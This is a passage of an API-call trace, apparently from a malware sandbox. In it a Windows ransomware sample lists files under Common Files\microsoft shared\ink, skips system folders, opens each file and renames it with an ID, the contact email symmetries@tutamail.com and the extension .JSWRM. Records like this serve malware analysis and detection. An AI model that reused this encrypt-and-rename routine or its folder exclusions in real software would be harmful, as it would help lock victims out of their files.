Size=0x10) returned 0x23a2a0 [0068.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0068.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1f1c60 [0068.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0068.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f1c60 | out: hHeap=0x1e0000) returned 1 [0068.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.103] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0068.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0068.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0068.103] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-dayi.xml", cAlternateFileName="")) returned 1 [0068.103] lstrcmpiW (lpString1="zh-dayi.xml", lpString2=".") returned 1 [0068.103] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="..") returned 1 [0068.103] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="...") returned 1 [0068.103] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="windows") returned 1 [0068.103] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="recovery") returned 1 [0068.103] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="perflogs") returned 1 [0068.103] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="documents and settings") returned 1 [0068.103] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.103] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="system volume information") returned 1 [0068.103] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="msocache") returned 1 [0068.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0068.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-dayi.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-dayi.xml", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zh-dayi.xml", lpUsedDefaultChar=0x0) returned 11 [0068.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0068.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-dayi.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-dayi.xml", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zh-dayi.xml", lpUsedDefaultChar=0x0) returned 11 [0068.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0068.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0068.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0068.104] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.104] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9954119286743800) returned 0 [0068.104] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.104] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.104] CloseHandle (hObject=0xffffffff) returned 1 [0068.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0068.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0068.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0068.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0068.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0068.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0068.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.104] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0068.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0068.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0068.105] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 1 [0068.105] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2=".") returned 1 [0068.105] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="..") returned 1 [0068.105] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="...") returned 1 [0068.105] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="windows") returned 1 [0068.105] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="recovery") returned 1 [0068.105] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="perflogs") returned 1 [0068.105] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="documents and settings") returned 1 [0068.105] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.105] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="system volume information") returned 1 [0068.105] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="msocache") returned 1 [0068.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-phonetic.xml", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-phonetic.xml", cchWideChar=15, lpMultiByteStr=0x345e870, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zh-phonetic.xml", lpUsedDefaultChar=0x0) returned 15 [0068.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-phonetic.xml", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-phonetic.xml", cchWideChar=15, lpMultiByteStr=0x345e840, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zh-phonetic.xml", lpUsedDefaultChar=0x0) returned 15 [0068.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0068.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0068.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0068.105] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.111] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9958070656656856) returned 0 [0068.111] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.111] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.111] CloseHandle (hObject=0xffffffff) returned 1 [0068.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0068.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0068.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0068.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1f1c60 [0068.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0068.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f1c60 | out: hHeap=0x1e0000) returned 1 [0068.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.111] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0068.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0068.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0068.112] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 0 [0068.112] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0068.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0068.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.113] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadda, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.xml", cAlternateFileName="")) returned 1 [0068.113] lstrcmpiW (lpString1="main.xml", lpString2=".") returned 1 [0068.113] lstrcmpiW (lpString1="main.xml", lpString2="..") returned 1 [0068.113] lstrcmpiW (lpString1="main.xml", lpString2="...") returned 1 [0068.113] lstrcmpiW (lpString1="main.xml", lpString2="windows") returned -1 [0068.113] lstrcmpiW (lpString1="main.xml", lpString2="recovery") returned -1 [0068.113] lstrcmpiW (lpString1="main.xml", lpString2="perflogs") returned -1 [0068.113] lstrcmpiW (lpString1="main.xml", lpString2="documents and settings") returned 1 [0068.113] lstrcmpiW (lpString1="main.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.113] lstrcmpiW (lpString1="main.xml", lpString2="system volume information") returned -1 [0068.113] lstrcmpiW (lpString1="main.xml", lpString2="msocache") returned -1 [0068.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0068.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.xml", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0068.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.xml", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="main.xml", lpUsedDefaultChar=0x0) returned 8 [0068.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0068.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.xml", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0068.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.xml", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="main.xml", lpUsedDefaultChar=0x0) returned 8 [0068.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0068.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.113] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.113] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10081696995333424) returned 0 [0068.113] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.114] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.114] CloseHandle (hObject=0xffffffff) returned 1 [0068.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0068.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0068.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0068.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.115] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0068.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.115] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cdb88, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskclearui", cAlternateFileName="OSKCLE~1")) returned 1 [0068.115] lstrcmpiW 